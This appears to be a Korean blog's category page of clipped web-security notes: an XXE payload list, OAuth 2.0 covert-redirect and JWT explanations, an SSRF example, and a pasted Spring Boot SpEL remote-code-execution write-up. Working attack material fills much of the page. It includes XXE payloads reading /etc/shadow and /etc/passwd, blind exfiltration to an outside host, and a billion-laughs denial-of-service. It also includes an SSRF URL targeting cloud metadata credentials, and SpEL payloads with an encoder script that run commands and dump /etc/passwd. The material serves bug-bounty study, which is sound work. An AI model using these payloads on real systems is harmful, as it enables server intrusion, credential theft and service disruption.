'웹'에 해당되는 글 67건

https://medium.com/bugbountywriteup/bug-bounty-broken-api-authorization-d30c940ccb42

https://www.kitploit.com/2019/11/xml-external-entity-xxe-injection.html?m=1

hat is XML external entity injection?
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.
In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

XML External Entity (XXE) Injection Payloads

XXE: Basic XML Example
<!--?xml version="1.0" ?--> <userInfo> <firstName>John</firstName> <lastName>Doe</lastName> </userInfo>

XXE: Entity Example
<!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY example "Doe"> ]> <userInfo> <firstName>John</firstName> <lastName>&example;</lastName> </userInfo>

XXE: File Disclosure
<!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]> <userInfo> <firstName>John</firstName> <lastName>&ent;</lastName> </userInfo>

XXE: Denial-of-Service Example
<!--?xml version="1.0" ?--> <!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol; <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> <tag>&lol9;</tag>

XXE: Local File Inclusion Example
<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)
<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY % xxe SYSTEM "file:///etc/passwd"> <!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>

XXE: Access Control Bypass (Loading Restricted Resources - PHP example)
<?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]> <foo><result>&ac;</result></foo>

XXE:SSRF ( Server Side Request Forgery ) Example
<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>

XXE: (Remote Attack - Through External Xml Inclusion) Exmaple
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY test SYSTEM "https://example.com/entity1.xml">]> <lolz><lol>3..2..1...&test<lol></lolz>

XXE: UTF-7 Exmaple
<?xml version="1.0" encoding="UTF-7"?> +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

XXE: Base64 Encoded
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

XXE: XXE inside SOAP Example
<soap:Body> <foo> <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]> </foo> </soap:Body>

XXE: XXE inside SVG
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"> <image xlink:href="expect://ls"></image> </svg>

https://meetup.toast.com/posts/105

1. OAuth 2.0 이란?

OAuth 2.0은 다양한 플랫폼 환경에서 권한 부여를 위한 산업 표준 프로토콜입니다.

(정의) 제 3의 앱이 자원의 소유자인 서비스 이용자를 대신하여 서비스를 요청할 수 있도록 자원 접근 권한을 위임하는 방법
출처 : 금융보안원 "OAuth 2.0 개요 및 보안 고려사항" 보안연구부-2015-030

Authorization Code Grant 방식

OAuth 2.0는 총 4 가지 인증 방법을 갖고 있는데, 그 중 비교적 안전한 Authorization code grant 방식의 인증 과정을 소개합니다. [그림 1]은 페이코에서 적용한 인증 프로세스로 Authorization code grant 방식을 사용하고 있습니다. 자세한 내용은 https://developers.payco.com/guide/development/start에서 확인할 수 있습니다.

[그림 1] 페이코의 OAuth 2.0 프로세스

2.2 Covert Redirect

OAuth 2.0 인증 Flow 중 redirect_uri 파라미터 값에 대해 검증이 누락되거나 미흡할 경우 발생하는 취약점입니다.

정상적인 경로라면 사용자(Resource Owner)가 로그인 성공 후 발급받은 Authorization code를 Client로 전달해야합니다. 그러나 [그림 3]과 같은 방법으로 공격자는 사용자(피해자)에게 변조된 Redirect URI를 보내 로그인을 유도합니다. 4번 단계에서 사용자(피해자)가 Redirect URI 값이 변조된 URL로 로그인할 경우, Authorization code 값이 공격자 서버로 전달되어 공격자는 사용자(피해자)의 계정을 탈취할 수 있습니다.

4. 마무리

OAuth 2.0 은 안전하지만 구현이 매우 복잡하기로 유명합니다.

복잡함 때문에 실제로도 OAuth 2.0를 제공하는 많은 서비스에서 취약점이 발견되고 있는데요, 구현만 제대로 한다면 안전하지만 매우 복잡하다보니 취약점이 존재할 확률이 높은 것 같습니다.

심지어 취약점이 발생할 경우 사용자 계정 탈취로 이어질 수 있으므로 OAuth 2.0 구현 시 충분한 이해와 준비, 검토가 요구되며 서비스 오픈 이후에도 꾸준한 보안 검수를 통해 취약점이 발생하지 않도록 관리가 필요합니다.

끝으로, OAuth 2.0 Authorization code grant 인증 방식 도표를 활용하여 취약점을 보완하기 위한 설명으로 마무리하겠습니다.

[그림 5] OAuth 2.0 Authorization code grant 인증 방식의 취약점 보완 방안

-----------------------------

책명 : 안전한 API 인증과 권한 부여를 위한 클라이언트 프로그래밍

OAuth 2.0

네이버 OAuth

https://elfinlas.github.io/2018/08/12/whatisjwt-01/

https://12bme.tistory.com/130

What is JWT?

JWT(Json Web Token)은 위에서 이야기 한 클레임 기반 토큰이며, 이름에서 알 수 있는 것처럼 JSON을 이용한 토큰이고 웹 표준(RFC 7519)를 구현한 것이다.

JWT는 헤더(header), 페이로드(payload), 서명(signature) 세 가지로 나눠져 있으며, 아래와 같은 형태로 구성되어 있다.

클레임(Claim)이란 사용자 정보나 데이터 속성 등을 의미한다.
그래서 클레임 토큰이라 하면 토큰 안에 저런 정보를 담고 있는 토큰이라 생각하면 된다.
예를 들면 아래와 같이 정보를 담고 있는 것을 클레임 기반이라 할 수 있다.

이런 클레임을 기반한 토큰 중 가장 대표적인 것이 바로 JWT다.

https://blog.naver.com/PostView.nhn?blogId=n_cloudplatform&logNo=221638724015&categoryNo=6&parentCategoryNo=0

https://www.hahwul.com/2017/09/web-hacking-new-attack-vectors-in.html

SSRF라는 단어가 생소하신 분들이 많으실텐데요.

SSRF 공격이란?

SSRF는 Server-Side Request Forgery의 약자로 Server Side에서 이루어지는 요청을 변조해

해커가 의도한 서버로 요청을 하게 되거나 요청 자체를 변경할 수 있는 공격을 말합니다.

SSRF 공격은 아래와 같이 이루어졌습니다!

​

http://고객사이트.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role

​

버그바운티나 현업에서 따로 시도를 해봐야겠네..

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

https://deadpool.sh/2017/RCE-Springs/

id=ab${12*12}cd

${(new%20java.lang.ProcessBuilder(%27calc%27)).start()}

https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md

This is my very frist blog post which was pending for a long time (almost a year). I would like to share a particular Remote Code Execution (RCE) in Java Springboot framework. I was highly inspired to look into this vulnerability after I read this article by David Vieira-Kurz, which can be found at his blog. His article talks about an RCE in the Spring Security OAuth framework and how the Whitelabel error page can be used to trigger code execution.

So this meant that any Whitelabel Error Page which reflected user input was vulnerable to it. This was because user input was being treated in as Springs Expression Language (SpEL). So during my pentest I had come across a particualr URL which triggered this Whitelabel Error page.

URL: https://<domain>/BankDetailForm?id=abc${12*12}abc

Error Page: 

My input of abc${12*12}abc was reflected as abc144abc. Then I wanted to perform a simple id and get the result on screen. I proceeded with the following payload:

URI: /BankDetailForm?id=${T(java.lang.Runtime).getRuntime().exec('id')}

Payload: ${T(java.lang.Runtime).getRuntime().exec('id')}

Error Page: 

Hmm…..I see nothing. The reflection gave back the input as it is. I double checked David’s blog to see if I was doing anything wrong. I was unsure as to what went wrong. Was the payload incorrect or did I make a mistake with the braces?? Nope. Everything was correct but I was still not getting my desired output. After fiddling around for a few hours I decided to fireup a demo Springs app and try to recreate the same scenario. I tried with a basic {5*5} and got 25 printed beautifully onscreen. Then I tried doing an id and bam!!!, it did not execute. I knew that I had to dig deeper because this was eating me up.

It got me thinking that quotes might have been encoded and might have broken the exec() command. Next thing was to look at the stack trace at the server and see what was wrong.

So after debugging I could see that single & double quotes were URL encoded. The exec() method clearly takes an argument as a string. Now I either need to find characters within the error code and take bits & pieces and pass it to exec using substring(), which is still pretty difficult or I need to find a way to pass my string without using double quotes or single qutoes. I wanted to go with the second approach. Java supports nested functions and if I’m able to find a method which can output id or cat etc/passwd, this would then be passed to exec() and then my payload would run successfully.

After going through some Java classes I stumbled upon the following:

java.lang.Character.toString(105) 
-> prints the characer 'i'

Now I need to concat the letter ‘d’ and I’m golden. Again concat() is a method and i’m going to nest the character.toString inside it as well.

java.lang.Character.toString(105).concat(T(java.lang.Character).toString(100))
-> prints the characters 'id'

Now crafting the final payload, I get the following:

https://<domain>/BankDetailForm?id=${T(java.lang.Runtime).getRuntime().exec(T(java.
lang.Character).toString(105).concat(T(java.lang.Character).toString(100)))}

The getRuntime() method returns the runtime object which we got on screen. Now we have some sort of a Blind RCE with which we can run any commands. I wanted to go a step further and get the output on screen (just for fun). At this point I wanted to do a cat etc/passwd and print the result onto the Whitelabel Error page. This meant for every character I would need to write its ASCII equivalent in the format concat(T(java.lang.Character).toString(<ascii value>)). Wrote a quick sloppy python script to acheive this:

Python Script:

#!/usr/bin/env python
from __future__ import print_function
import sys

message = raw_input('Enter message to encode:')

print('Decoded string (in ASCII):\n')
for ch in message:
   print('.concat(T(java.lang.Character).toString(%s))' % ord(ch), end=""), 
print('\n')

Now to get the output of cat etc/passwd in the response, we will use the IOUtils class and call the toString() method. We can pass an input stream to this method and get the contents of the stream as a response.

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).get
Runtime().exec(T(java.lang.Character).toString(99).concat(T(ja
va.lang.Character).toString(97)).concat(T(java.lang.Character).toStri
ng(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.la
ng.Character).toString(47)).concat(T(java.lang.Character).toString(10
1)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.C
haracter).toString(99)).concat(T(java.lang.Character).toString(47)).c
oncat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).
toString(97)).concat(T(java.lang.Character).toString(115)).concat
(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toStrin
g(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

The payload became quite huge. To sum up, I used the Apache IOUtils library. I converted cat etc/passwd into ASCII characters using the character class, passed this value to the exec() method and got the input stream and passed it to the toString() method of IOUtils class. Awesome isnt it. I tried this on the remote box and got the following.

All this hassle just to get around the single and double quotes. However I feel there might have been easier ways to go about it. Tackling out the hurdles and troubleshooting and debugging and finally getting what you want is such a serene feeling. This bug was a learning curve for me and I learned a lot of things alongside exploiting this. If you are using an older version of Spring Boot, I would highly advise you to upgrade it. The vulnerability has been patched since Spring Boot 1.2.8.

https://www.kitploit.com/2019/11/sql-injection-payload-list.html?m=1